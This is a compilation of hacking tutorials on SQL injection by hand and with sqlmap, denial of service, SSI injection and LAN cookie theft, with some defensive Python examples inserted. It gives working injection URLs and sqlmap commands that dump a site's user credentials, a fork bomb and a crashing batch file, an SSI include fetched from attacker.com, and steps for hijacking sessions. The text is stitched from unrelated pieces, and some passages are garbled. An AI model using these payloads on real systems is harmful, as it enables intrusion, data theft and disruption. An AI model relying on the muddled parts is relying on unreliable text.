We now have the names of all the tables. Here it is – CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,ENGINES,EVENTS,FILES,GLOBAL_STATUS,GLOBAL_VARIABLES,KEY_COLUMN_USAGE,PARTITIONS,PLUGINS,PROCESSLIST,PROFILING,REFERENTIAL_CONSTRAINTS,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,SESSION_STATUS,SESSION_VARIABLES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVIL
As you see, the ending of the last table is incomplete. To correct this, you can modify the end of the url to something like +from+information_schema.tables+where+table_schema=database()

Obtaining columns

It is similar to obtaining tables, other than the fact that we will use information_schema.columns instead of information_schema.tables, and get multiple columns instead of just one using the same group_concat. We will also have to specify which table to use, in hex. We will use the table events (I've highlighted it above too). In hex its code is 4556454e5453 (you can use a text-to-hex converter; also prefix 0x to the code before entering it). The final code will be:

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(column_name)+from+information_schema.columns+where+table_name=0x4556454e5453

 

We now know the columns of the table events

Extracting data from columns

We will follow the same pattern as we did so far. We had replaced the vulnerable column (i.e. 11) with table_name first, and then column_name. Now we will replace it with the column we want to obtain data from. Let’s assume we want the data from the first column in the above pic, i.e. EVENT_CATALOG. We will use the following URL-

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,EVENT_CATALOG+from+information_schema.EVENTS

The page didn’t display properly, which means that our query was fine. The lack of any data is due to the fact that the table was actually empty. We have to work with some other table now. Don’t let this failure demotivate you.

However, our luck has finally betrayed us, and all this time we have been wasting our time on an empty table. So we’ll have to look at some other table now, and then look at what columns that table has. So, I looked at the first table in the list, CHARACTER_SETS, and its first column CHARACTER_SET_NAME. Now finally we have the final code as-

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME)+from+information_schema.CHARACTER_SETS

This table has a lot of data, and we have all the character_sets name.

So finally now you have data from the CHARACTER_SET_NAME column of the CHARACTER_SETS table. In a similar manner you can go through other tables and columns. It will definitely be more interesting to look through a table whose name sounds like ‘USERS’ and whose columns have names like ‘USERNAME’ and ‘PASSWORD’. I will show you how to organize results in a slightly better way and display multiple columns at once. This query will return the data from 4 columns, separated by a colon (:), whose hex code is 0x3a.

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME,0x3a,DEFAULT_COLLATE_NAME,0x3a,DESCRIPTION,0x3a,MAXLEN)+from+information_schema.CHARACTER_SETS

 

Finally you have successfully conducted an SQL injection attack in the hardest possible way, without using any tools at all. We will soon be discussing some tools which make the whole process a lot easier. However, it is pointless to use tools if you don’t know what they actually do.
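As an added illustration (not code from the original tutorial), the following Python program reproduces the defect behind listproducts.php?cat= against a constructed in-memory SQLite database and puts the hardened version beside it. The tables and rows are made up, and SQLite stands in for MySQL, so there is no information_schema and the UNION pulls from a users table instead.

```python
import sqlite3


def build_db():
    # Constructed stand-in for the tutorial's shop database: a products table
    # that listproducts.php?cat=N reads from, and a users table holding the
    # kind of data a UNION payload goes after. All rows are made up.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER, cat INTEGER, name TEXT, price TEXT);
        CREATE TABLE users (id INTEGER, name TEXT, email TEXT, pass TEXT);
        INSERT INTO products VALUES (1, 1, 'Poster', '9.99'), (2, 2, 'Mug', '4.50');
        INSERT INTO users VALUES (1, 'John Smith', 'email@email.com', 'test');
    """)
    return conn


def list_products_vulnerable(conn, cat):
    # The defect behind the tutorial: the cat parameter is concatenated into
    # the SQL text, so "-1 UNION SELECT ..." is parsed as part of the query.
    sql = "SELECT id, name, price FROM products WHERE cat=" + cat
    return conn.execute(sql).fetchall()


def list_products_bound_only(conn, cat):
    # Parameter binding alone: the value is handed to the engine separately
    # from the SQL text, so it is compared as data and never parsed as SQL.
    sql = "SELECT id, name, price FROM products WHERE cat=?"
    return conn.execute(sql, (cat,)).fetchall()


def list_products_hardened(conn, cat):
    # Defence in depth: reject anything that is not an integer before the
    # query is built, and still bind the value as a parameter.
    cat_id = int(cat)  # raises ValueError on any injection text
    return list_products_bound_only(conn, cat_id)


def demo():
    conn = build_db()
    # Same shape as the tutorial's payload: a non-matching cat value followed
    # by a UNION that selects the same number of columns as the real query.
    payload = "-1 UNION SELECT id, name, pass FROM users"
    leaked = list_products_vulnerable(conn, payload)
    inert = list_products_bound_only(conn, payload)
    try:
        list_products_hardened(conn, payload)
        rejected = False
    except ValueError:
        rejected = True
    return leaked, inert, rejected


if __name__ == "__main__":
    leaked, inert, rejected = demo()
    print("concatenated query leaked:", leaked)
    print("bound parameter returned:", inert)
    print("integer check rejected the payload:", rejected)
```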

Hacking Website with Sqlmap in Kali Linux


In the previous tutorial, we hacked a website using nothing but a simple browser on a Windows machine. It was a pretty clumsy method to say the least. However, knowing the basics is necessary before we move on to the advanced tools. In this tutorial, we’ll be using Kali Linux (see the top navigation bar to find how to install it if you haven’t already) and SqlMap (which comes preinstalled in Kali) to automate what we manually did in the Manual SQL Injection tutorial to hack websites.

Now it is recommended that you go through the above tutorial once so that you can get an idea about how to find vulnerable sites. In this tutorial we’ll skip the first few steps in which we find out whether a website is vulnerable or not, as we already know from the previous tutorial that this website is vulnerable.

Kali Linux

First off, you need to have Kali linux (or backtrack) up and running on your machine. Any other Linux distro might work, but you’ll need to install Sqlmap on your own. Now if you don’t have Kali Linux installed, you might want to go to this page, which will get you started on Beginner Hacking Using Kali Linux

 

Sqlmap

Basically it’s just a tool to make SQL Injection easier. Their official website introduces the tool as -“sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.”
A lot of features can be found on the SqlMap website, the most important being – “Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.” That’s basically all the database management systems. Most of the time you’ll never come across anything other than MySql.

Hacking Websites Using Sqlmap in Kali linux

Sql Version

Boot into your Kali linux machine. Start a terminal, and type –

sqlmap -h

It lists the basic commands that are supported by SqlMap. To start with, we’ll execute a simple command
sqlmap -u <URL to inject>. In our case, it will be-

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1

Sometimes, using the --time-sec option helps to speed up the process, especially when the server responses are slow.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --time-sec 15

Either way, when sqlmap is done, it will tell you the MySQL version and some other useful information about the database.
The final result of the above command should be something like this.
Note: Depending on a lot of factors, sqlmap may sometimes ask you questions which have to be answered with yes/no. Typing y means yes and n means no. Here are a few typical questions you might come across-
  • Some message saying that the database is probably Mysql, so should sqlmap skip all other tests and conduct mysql tests only. Your answer should be yes (y).
  • Some message asking you whether or not to use the payloads for specific versions of MySQL. The answer depends on the situation. If you are unsure, then it’s usually better to say yes.

Enumeration

Database

In this step, we will obtain database name, column names and other useful data from the database.
List of  a few common enumeration commands
So first we will get the names of the available databases. For this we will add --dbs to our previous command. The final command will look like –

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

So the two databases are acuart and information schema.

Table

Now we are obviously interested in the acuart database. Information schema can be thought of as a default database which is present on all your targets, and contains information about the structure of databases, tables, etc., but not the kind of information we are looking for. It can, however, be useful on a number of occasions. So, now we will specify the database of interest using -D and tell sqlmap to list the tables using the --tables option. The final sqlmap command will be-

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables

The result should be something like this –
Database: acuart
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+
Now we have a list of tables. Following the same pattern, we will now get a list of columns.

Columns

Now we will specify the database using -D, the table using -T, and then request the columns using --columns. I hope you guys are starting to get the pattern by now. The most appealing table here is users. It might contain the usernames and passwords of registered users on the website (hackers always look for sensitive data).
The final command must be something like-

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns

The result would resemble this-

Data

Now, if you were following along attentively, you will expect that we will now be getting data from one of the columns. While that hypothesis is not completely wrong, it’s time we go one step ahead. Now we will be getting data from multiple columns. As usual, we will specify the database with -D, the table with -T, and the columns with -C. We will get all data from the specified columns using --dump. We will enter multiple columns and separate them with commas. The final command will look like this.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C email,name,pass --dump

Here’s the result

John Smith, of course. And the password is test. Email is email@email.com?? Okay, nothing great, but in the real world web pentesting, you can come across more sensitive data. Under such circumstances, the right thing to do is mail the admin of the website and tell him to fix the vulnerability ASAP. Don’t get tempted to join the dark side. You don’t look pretty behind the bars. That’s it for this tutorial.


Denial Of Service Attacks : Explained for Beginners and Dummies


Just like most other things associated with hacking, a denial of service attack is not everyone’s cup of tea. It, however, can be understood if explained properly. In this tutorial, I’ll try to give you a big picture of denial of service attacks, before I start using geeky terms like packets and all that. We’ll start at the easiest point.

What effect does a denial of service attack have

 

Wireless hacking usually gives you the password of a wireless network. A man in the middle attack lets you spy on network traffic. Exploiting a vulnerability and sending a payload gives you access and control over the target machine. What exactly does a Denial of Service (DOS) attack do? Basically, it robs the legitimate owner of a resource of the right to use it. I mean if I successfully perform a DOS on your machine, you won’t be able to use it anymore. In the modern scenario, it is used to disrupt online services. Many hacktivist groups (internet activists who use hacking as a form of active resistance – a name worth mentioning here is Anonymous) do a Distributed Denial of Service attack on government and private websites to make them listen to the people’s opinion (the legitimacy of this method of dictating your opinion has been a topic of debate, and a lot of hacktivists had to suffer jail time for participating in DDOS). So basically it’s just what its name suggests, Denial Of Service.

Basic Concept

It uses the fact that while a service can be more than sufficient to cater to the demands of the desired users, a drastic increase in unwelcome users can make the service go down. Most of us use the words like “This website was down the other day” without any idea what it actually means. Well now you do. To give you a good idea of what is happening, I’ll take the example from the movie “We Are Legion”.

Scenario One : Multiplayer online game

Now consider you are playing an online multi-player game. There are millions of other people who also play this game. Now there’s a pool in the game that everyone likes to visit. Now you and your friends know that you have the power of numbers. There are a lot of you, and together you decide to make identical characters in the game. And then all of you go and block the access to the pool. You just carried out a denial of service attack. The users of the game have now been deprived of a service which they had obtained the right to use when they signed up for the game. This is just what the guys at 4chan (birthplace and residence of Anonymous) did a long time ago. This is the kind of thing that gives you a very basic idea what a denial of service attack can be.
Denial of service in a game
They made a Swastika and blocked access to the pool

Scenario 2 : Bus stop

Now assume that due to some reason, you want to disrupt the bus service of your city and stop the people from using the service. To stop the legitimate people from utilizing this service, you can call your friends to unnecessarily use it. Basically you can invite millions of friends to come and crowd around all the bus stops and take the buses without any purpose. Practically it is not feasible since you don’t have millions of friends, and they are definitely not wasting their time and money riding aimlessly from one place to another.
So while this may seem impossible in the real world, in the virtual world you can cause as much load as a thousand (or even a million) users alone at the click of a button. There are many tools out there for this purpose; however, you are not recommended to use them, as a DOS on someone else is illegal and easy to detect (Knock, knock. It’s the police). We will come back to this later, and do a DOS on our own computer.

How denial of service attacks are carried out

Basically, when you visit a website, you send them a request to deliver their content to you. What you send is a packet. Actually, it takes more than just one packet; you need a lot of them. But still, the bandwidth that you consume in requesting the server to send you some data is very little. In return, the data they send you is huge. This takes up server resources, which they pay for. A legitimate view can easily earn more than the server costs on account of advertisements, etc. So, companies buy servers that can provide enough data transfer for their regular users. However, if the number of users suddenly increases, the server gives up. It goes down. And since the company knows it is under DOS, it just turns off the server, so that it does not have to waste its monetary resources on a DOS, and waits till the DOS stops.

Now with modern computers and bandwidth, we alone can easily pretend to be a thousand or even more users at once. While this is not good for the server, it is not something that can make it succumb (your computer is not the only thing that gets better with time; the servers do too). However, if a lot of people like you do a DOS attack, it becomes a distributed denial of service attack. This can easily be fatal for a server. It’s just like you go to a page, and start refreshing it very fast, maybe a thousand times every second. And you are not the only one. There are a thousand others that are doing the same thing. So basically you guys are equivalent to more than a million users using the site simultaneously, and that’s not something the server can take. Sites like Google and Facebook have stronger servers, and algorithms that can easily identify a DOS and block the traffic from that IP. But it’s not just the websites that get better; the black hat hackers too are improving every day. This leaves a huge scope for understanding DOS attacks and becoming an asset to one of these sides (the good, the bad and the ugly).

 

A Live DOS on your Kali Machine

If you have Kali Linux (the hacker’s OS, the OS of choice if you use this blog) then here’s a small exercise for you.
We are going to execute a command in the Kali Linux terminal that will cripple the operating system and make it hang. It will most probably work on other Linux distributions too.
Warning: This code will freeze Kali Linux, and most probably it will not recover from the shock. You’ll lose any unsaved data. You will have to restart the machine the hard way (turn off the virtual machine directly or cut the power supply if it’s a real machine). Just copy and paste the code and your computer is gone.

:(){ :|:& };:

 

The machine froze right after I pressed enter. I had to power it off from the VMware interface.
What basically happened is that the one-line command asked the operating system to keep opening processes very fast for an infinite period of time. It just gave up.
Here’s something for the Windows Users

Crashing Windows Using Batch file

Open a notepad. Put the following code in it-

:1
Start
goto 1

Save the file as name.bat
Bat here is batch file extension. Run it. Game over.
It basically executes the second line, and the third line makes it go over to the first, execute the second, and then over to first again, execute the second….. infinitely. So again, denial of service. All the processing power is used by a useless command, while you, the legitimate user, can’t do anything.
That’s it for this tutorial, we’ll discuss the technical details of a practical denial of service in a later tutorial.

Denial Of Service Methods : ICMP, SYN, teardrop, botnets

In a previous post, I had introduced you to the basic idea of a denial of service attack. We used real life examples (bus stop and online game) to depict the idea behind a DOS attack. We crashed our own Windows and Kali Linux machines (using a batch file and the command line interface respectively). Now it’s time to learn how DOS attacks actually work, in terms of packets and other networking terms. So here is a one by one description of four of the well known attacks.

Various methods of Denial Of Service attack

ICMP flooding (smurfing)

Before I go off explaining what the attack is, first I’ll tell you about the packets.
Contents of an ICMP packet (should not bother you currently)

ICMP packets have two purposes (technically)-

  • It is used by network devices, like routers, to send error messages indicating, for example, that a requested service is not available or that a host or router could not be reached
  • It is also used to relay query messages
Practically, all an ICMP packet does is confirm connectivity. You send a message to an IP and see if you are connected. If not, you get an error like “Destination unreachable”. Pings use the ICMP packet.
While the packet as a whole allows us to directly attack the network by flooding it with a lot of ICMP packets, the second ability listed above gives us a new advantage. We can send ICMP relay packets to a network with a spoofed source IP (we will change our IP to that of the target), and when the network replies to our packet, it will reply to the spoofed IP, causing it to be flooded with ICMP packets. This is called indirect ICMP flooding, also known as smurfing. It is tougher to detect than a normal direct ICMP attack, and the network serves as an amplifier, the larger the better, making the attack much stronger, since you have the power of many computers at your disposal, instead of just one. If the target is flooded with enough packets, it loses its ability to respond to genuine packets, resulting in a successful Denial of Service attack.

SYN flooding

The three way handshake (that didn’t happen in our case)

In SYN flooding, the attacker sends the target a large number of TCP/SYN packets. These packets have a source address, and the target computer replies (TCP/SYN-ACK packet) back to the source IP, trying to establish a TCP connection. In ideal conditions, the target receives an acknowledgement packet back from the source, and the connection established is in a fully open state. However, the attacker uses a fake source address while sending TCP packets to the victim, and the target’s reply goes to a nonexistent IP, and therefore does not generate an acknowledgement packet. The connection is never established, and the target is left with a half-open connection. Eventually, a lot of half-open connections are created, and the target network gets saturated to the point where it does not have resources left to respond to genuine packets, resulting in a successful DOS attack. Also, since the connections stay open for a while, the server loses its ability to work for a good amount of time after the attack has been stopped.
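The half-open connections described above are visible in the kernel’s socket table (for instance in `ss -tan` output on Linux). The following Python check, an added example rather than anything from the original post, parses constructed sample lines in that layout and flags a suspected SYN flood from the count of SYN-RECV sockets relative to established ones; the addresses and the thresholds are assumptions.

```python
from collections import Counter

# Constructed sample in the column layout of `ss -tan` on Linux
# (State Recv-Q Send-Q Local Address:Port Peer Address:Port). Addresses are
# from documentation ranges. The flood sample shows the pattern the text
# describes: many half-open (SYN-RECV) sockets, each from a different
# (spoofed) source, next to only a couple of completed handshakes.
FLOOD_SAMPLE = """\
State      Recv-Q Send-Q Local Address:Port  Peer Address:Port
ESTAB      0      0      10.0.0.5:80         198.51.100.20:40112
ESTAB      0      0      10.0.0.5:80         198.51.100.21:40113
SYN-RECV   0      0      10.0.0.5:80         203.0.113.1:51234
SYN-RECV   0      0      10.0.0.5:80         203.0.113.2:51235
SYN-RECV   0      0      10.0.0.5:80         203.0.113.3:51236
SYN-RECV   0      0      10.0.0.5:80         203.0.113.4:51237
SYN-RECV   0      0      10.0.0.5:80         203.0.113.5:51238
SYN-RECV   0      0      10.0.0.5:80         203.0.113.6:51239
SYN-RECV   0      0      10.0.0.5:80         203.0.113.7:51240
SYN-RECV   0      0      10.0.0.5:80         203.0.113.8:51241
"""

# Constructed sample of a healthy server: one handshake in progress is normal.
NORMAL_SAMPLE = """\
State      Recv-Q Send-Q Local Address:Port  Peer Address:Port
ESTAB      0      0      10.0.0.5:80         198.51.100.20:40112
ESTAB      0      0      10.0.0.5:80         198.51.100.21:40113
ESTAB      0      0      10.0.0.5:80         198.51.100.22:40114
SYN-RECV   0      0      10.0.0.5:80         198.51.100.23:40115
"""


def parse_ss(text):
    """Return (state, local_port, peer_ip) for each socket line."""
    sockets = []
    for line in text.splitlines()[1:]:  # first line is the header
        parts = line.split()
        if len(parts) < 5:
            continue
        state, local, peer = parts[0], parts[3], parts[4]
        local_port = local.rsplit(":", 1)[1]
        peer_ip = peer.rsplit(":", 1)[0]
        sockets.append((state, local_port, peer_ip))
    return sockets


def half_open_summary(text):
    sockets = parse_ss(text)
    half_open = [s for s in sockets if s[0] == "SYN-RECV"]
    established = [s for s in sockets if s[0] == "ESTAB"]
    return {
        "half_open": len(half_open),
        "established": len(established),
        # With spoofed sources this climbs with the flood, so a per-address
        # threshold would never trigger; the total is what matters.
        "distinct_sources": len({s[2] for s in half_open}),
        "top_sources": Counter(s[2] for s in half_open).most_common(3),
    }


def syn_flood_suspected(text, min_half_open=5, min_ratio=2.0):
    """Assumed thresholds: at least min_half_open SYN-RECV sockets and at
    least min_ratio times as many half-open as established connections."""
    s = half_open_summary(text)
    if s["half_open"] < min_half_open:
        return False
    if s["established"] == 0:
        return True
    return s["half_open"] / s["established"] >= min_ratio


if __name__ == "__main__":
    for label, sample in (("flood", FLOOD_SAMPLE), ("normal", NORMAL_SAMPLE)):
        print(label, half_open_summary(sample), syn_flood_suspected(sample))
```

Because the sources are spoofed, no single address stands out while distinct_sources climbs, which is why the check keys on the half-open total rather than on any one peer; Linux SYN cookies (net.ipv4.tcp_syncookies) are the usual mitigation for exactly this state.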

Teardrop attack

First of all – In computer networking, a mangled or invalid packet is a packet — especially IP packet — that either lacks order or self-coherence, or contains code aimed to confuse or disrupt computers, firewalls, routers, or any service present on the network. (source : Wikipedia)
Now in a teardrop attack, mangled IP packets are sent to the target. They are overlapping, over-sized, and loaded with payloads. Now various operating systems have a bug in their TCP/IP fragmentation re-assembly code. What that means is, when the OS tries to re-assemble the TCP/IP packets that it gets, a piece of code exploits a bug in the way the re-assembling process works, and the OS crashes. This bug has been fixed, and only Windows 3.1x, Windows 95 and Windows NT operating systems, as well as versions of Linux prior to versions 2.0.32 and 2.1.63, are vulnerable to this attack. This type of attack does not require much bandwidth on the user side, and has a devastating effect on the targeted server.

Botnets

A small botnet

Now, this is not an attack as such; rather, it is a way of carrying out the attacks more effectively. When carried out against a large server, the above attacks usually prove ineffective. Your home router is nothing when compared to the HUGE servers that big websites have, and handling a single PC’s DOS effect can be a piece of cake. This leads to the need for a Distributed Denial of Service attack. In a distributed denial of service, hacking groups use their numbers as strength. For example, if you have 500 friends who know how to carry out a denial of service attack, then the combined impact is much more dangerous than that of a lone PC. However, it is not always possible to have 500 hackers next door, and not all of us are part of large black hat hacking organisations.

Try not to end up like this

This is where the botnets step in. Now the bad guys use tools called RATs (remote administration tools) to infect and get total control over computers over the internet. The RATs are a kind of trojan, and can lie there on your PC and you’ll never find out. By the use of crypting, some hackers have mastered anti-virus evasion, and these RATs can lie undetected on your PC for years. This is 100% illegal. You can easily end up in jail for this, and I recommend that you stay away from this. But, it’s important that you are aware of the existence of such tools, and more importantly, what the hackers can do with them. Now let’s assume you made a RAT and it has infected 10,000 people. You can actually control those 10,000 computers. Now there’s this website server that you don’t like, and you’re this badass hacker who takes down stuff he doesn’t like. No, you don’t have a warehouse full of networking power (servers), but you do have ten thousand computers at your disposal, and this is called a botnet. You also have 5 friends who are hackers, and have similarly sized botnets. Such immense networking power can easily take down a large website for hours, if not days. The results of flooding packets from 50,000 computers can be catastrophic. With modern day firewalls, it is almost impossible to flood servers and take them down using a single computer, so while botnets are the most unethical entities, they are also the most powerful. Now here is a suggestion: Denial of Service attacks are easy to trace back (if you are a beginner), and even if you are good, there is always someone better, and you can’t hide forever. So try not to send bad packets at random websites; you won’t look good in orange.

What is a Server Side Include Injection Attack or SSI Injection Attack ?

Many times attackers exploit security vulnerabilities in web applications and inject their malicious code into the server to steal sensitive data, spread malware or do other malicious activities. The Server Side Includes Injection Attack or SSI Injection Attack is one such attack.
In SSI Injection Attack, the attacker takes advantage of security vulnerabilities of web applications to inject their malicious code using Server Side Includes directives and perpetrate the attacks.
What is Server Side Includes or SSI ?
Nowadays, most of the web servers handle dynamic pages. It takes input from the user in the form of text box, radio buttons, pictures etc and the information is passed to a program in the web server, which then processes the information and generates output. The output is sent back to our browser and our browser finally displays the HTML page.
But, at times dynamically generating the whole page becomes inefficient and it is not needed too. Instead, a part of the page content can be dynamically generated and it can be added to an existing HTML page. Server Side Includes are directives that are used for that purpose. Using these directives, dynamic contents can be embedded to an existing HTML page and then displayed.
For example, a webpage may display local date and time to a visitor. Dynamically generating the page every time using some program or dynamic technology may prove to be inefficient. Instead, one can put the following SSI directive to an existing HTML page :
<!--#echo var="DATE_LOCAL" -->
As a result, whenever the page will be served to the client, this particular fragment will be evaluated and replaced with the current local date and time :
Sunday, 25-Jan-2016 12:00:00 EST
The decision of whether to use SSI directives to dynamically generate a particular fragment of the page or to dynamically generate the whole page using some dynamic technology, often depends on how much of the page is to be dynamically generated. If a major part of the page content is to be dynamically generated, then SSI may not be a good solution.
Server Side Includes Injection Attack or SSI Injection Attack
In an SSI Injection Attack, the attacker first finds out whether a web application is vulnerable to Server Side Includes Injection or SSI Injection. Normally, a web application is vulnerable to SSI Injection through manipulation of existing SSI directives in use or through a lack of proper validation of user inputs.
If a web application has pages with the extension .stm, .shtm or .shtml, that would indicate to the attackers that the web application is using SSI directives to dynamically generate page contents. At this point, if the web server permits SSI execution without proper validation, then the attacker can trick the web server into executing SSI directives to manipulate the filesystem of the web server and thus add, modify and delete files, or display the content of sensitive files like /etc/passwd.
On the other hand, the attacker can type the following characters in the user input field to find out whether the web application properly validates the user inputs :
< ! # = / . " - > and [a-zA-Z0-9]
As these are the characters often used by SSI directives, the web application will become vulnerable to SSI Injection if it cannot properly validate the user inputs and allow these characters to be present in the input when they are not expected. The attacker can take advantage of that and access sensitive information or execute shell commands for nefarious purposes.
As the SSI directives are executed before supplying the page content to the client, the data intended for the attack will be displayed the next time the webpage is loaded.
Example
Suppose, a web application is vulnerable to SSI Injection. At this point, the attacker can trick the web server to execute the following SSI directive and display current document filename :
<!--#echo var="DOCUMENT_NAME" -->
The attacker can create a file attack.shtml with the following content :
attack.shtml

<!--#include file="AAAA....AAAA" -->

with number of A’s more than 2049.
At this point, suppose the web application loads a legitimate URL like :
vulnerable.com/index.asp?page=about.asp
Now, the attacker can include his own file attack.shtml in the web application like :
vulnerable.com/index.asp?page=attacker.com/index.asp?page=attack.shtml


If the web server returns a blank page, that would indicate an overflow has occurred. So, the attacker can now get enough information to trick the web application to execute malicious code.



How To Stay Safe
- User inputs should be properly validated so that it does not contain characters like <, !, #, =, /, ., ", -, > and [a-zA-Z0-9] if they are not needed.
- Make sure the web server only executes SSI directives needed for a particular web page.
- HTML entity encode user inputs before passing it to a page that executes SSI directives.
- Make sure a page is executed with the permission of the file owner, instead of that of the web server user.
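As an added example (not from the original article), the following Python functions implement the first three points of the list: an allow-list check that rejects the SSI special characters, HTML-entity encoding that neutralises the <!--#echo ...--> directive shown above, and a pattern check that confirms no directive survives before the value reaches a page that executes SSI. The field name and its allowed character set are assumptions for a plain-text name field.

```python
import html
import re

# Matches an SSI directive such as <!--#echo var="DOCUMENT_NAME" --> or
# <!--#include file="..." -->, tolerating whitespace after the comment opener.
SSI_DIRECTIVE = re.compile(r"<!--\s*#\s*[A-Za-z]+[^>]*-->")

# Assumed allow-list for a plain-text name field: letters, digits, spaces and
# a few punctuation marks. None of the SSI characters (< ! # = / . " - >)
# listed in the text are permitted.
SAFE_NAME = re.compile(r"[A-Za-z0-9 ,'_]{1,64}")


def contains_ssi_directive(value):
    return SSI_DIRECTIVE.search(value) is not None


def is_valid_name(value):
    return SAFE_NAME.fullmatch(value) is not None


def validate_name(value):
    # First defence: reject the input outright when it carries characters the
    # field has no use for, instead of trying to clean it up.
    if not is_valid_name(value):
        raise ValueError("name contains characters that are not allowed")
    return value


def encode_for_ssi_page(value):
    # Second defence: HTML-entity encoding turns < and > into &lt; and &gt;,
    # so the server never sees the <!--# opening sequence and cannot execute it.
    return html.escape(value, quote=True)


def render_greeting(user_input):
    # Third defence: confirm that nothing directive-shaped survived encoding
    # before the fragment is placed in a page that executes SSI.
    encoded = encode_for_ssi_page(user_input)
    if contains_ssi_directive(encoded):
        raise RuntimeError("SSI directive survived encoding")
    return "<p>Hello, " + encoded + "</p>"


if __name__ == "__main__":
    probe = '<!--#echo var="DOCUMENT_NAME" -->'
    print("valid name:", is_valid_name(probe))
    print("directive found:", contains_ssi_directive(probe))
    print(render_greeting(probe))
```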


Being informed about various web application security vulnerabilities is the very first step towards safeguarding a web application. Hope this article served its purpose.

Session Hijacking Tutorial [cookie stealing]

First of all, before going any further you have to understand what a cookie is. So what is a cookie? A cookie is a small piece of information that is stored in the user’s client (browser) when a user visits a website. It is generated by the web server and sent to the browser for authentication purposes. Let’s say you log in to your Facebook account; when you log in, session data is created on Facebook’s server and it sends a cookie file to your browser. When you do some activity in Facebook, these two things are compared and matched every time. So if we manage to steal this cookie file from someone we will have access to their account. In this tutorial I will show you how to do this in a LAN. (This method will not work if the victim is not connected to your network.)
 
 
So in this tutorial you will be using a tool called Wireshark and a Firefox add-on called Add N Edit Cookies.

When this process is done, just minimize Cain And Abel.

Wireshark is a tool used to sniff packets from the network clients. We will be using this to steal our cookies.
The Add N Edit Cookies add-on is used to inject the stolen cookie into the Firefox browser.

Download and install Wireshark, open it up and click on “Capture” from the menu bar. Select your interface and click Start. This will start to capture all the packets from your network.

Now find the packets using the filter http.cookie.
Look for packets which have POST and GET in them. This is the HTTP information sent to the server.


Now once you have found the cookie, copy its value like this:

Paste it and save it in a notepad file. Now the final thing to do is open Firefox and start the Add N Edit Cookies add-on from the Tools menu. Now insert the stolen cookie here, and you’re done! You should have access to the victim’s account now!
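The cookie in this tutorial could be copied off the wire because it travelled in cleartext HTTP. The following Python audit, an added example that is not part of the original post, parses constructed Set-Cookie headers in the layout Wireshark displays and reports the attributes whose absence makes this attack possible; the cookie names and values are made up.

```python
# Constructed HTTP response headers, in the layout Wireshark shows for a
# plain-HTTP login response. Cookie names and values are made up.
SAMPLE_RESPONSE = """\
HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: sessionid=9f3a1c2d; Path=/
Set-Cookie: csrftoken=b7e2; Path=/; Secure; HttpOnly; SameSite=Lax
"""


def parse_set_cookie(header_value):
    """Split 'name=value; Attr; Attr=val' into (name, value, {attr: val})."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        attrs[key.strip().lower()] = val.strip() or True
    return name.strip(), value.strip(), attrs


def audit_cookie(header_value):
    """Return (cookie name, list of findings) for one Set-Cookie value."""
    name, _value, attrs = parse_set_cookie(header_value)
    findings = []
    if "secure" not in attrs:
        # Without Secure the browser also sends the cookie over plain HTTP,
        # which is exactly what a sniffer on the same network reads.
        findings.append("missing Secure: cookie is sent in cleartext over HTTP")
    if "httponly" not in attrs:
        findings.append("missing HttpOnly: cookie is readable by page scripts")
    if "samesite" not in attrs:
        findings.append("missing SameSite: cookie is sent on cross-site requests")
    return name, findings


def audit_response(raw_headers):
    """Map each Set-Cookie in a raw header block to its findings."""
    results = {}
    for line in raw_headers.splitlines():
        key, _, val = line.partition(":")
        if key.strip().lower() == "set-cookie":
            name, findings = audit_cookie(val.strip())
            results[name] = findings
    return results


if __name__ == "__main__":
    for name, findings in audit_response(SAMPLE_RESPONSE).items():
        print(name, "->", findings or ["ok"])
```

The server in this tutorial accepts the pasted cookie because the cookie is the whole credential; serving the site over HTTPS with the Secure flag keeps it off the cleartext path a LAN sniffer can see.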

SQLmap Tutorial


Running sqlmap yourself is not difficult. Read through this tutorial and you will get an introduction to a powerful sql injection testing tool. Of course this is the same tool we use on our online sql injection test site.

One thing to keep in mind is that Sqlmap is a Python based tool; this means it will usually run on any system with Python. However, we like Ubuntu: it simply makes it easier to get stuff done. Python comes already installed in Ubuntu. To get started with sqlmap it is a matter of downloading the tool, unpacking it and running the command with the necessary options. Let’s not get ahead of ourselves; there may be some Windows users amongst you, so let me start off with getting an Ubuntu install up and running. It is easy to get started on an Ubuntu Linux system even if the thought of Linux sends you into shivering spasms of fear. Who knows, you may even like it.

If you are running Microsoft Windows as your main operating system you will likely find it the most convenient and simple to run an install of Ubuntu Linux in a virtual machine. You can then play with sqlmap, nmap, nikto and openvas along with a hundred other powerful open source security tools. If you would like to perform remote scanning such as that provided by hackertarget.com you could pay for a cheap Ubuntu based VPS from one of hundreds of providers, paying anything from $10 per month to $100 or so. Linode is great for this, providing high quality and solid systems for the price.

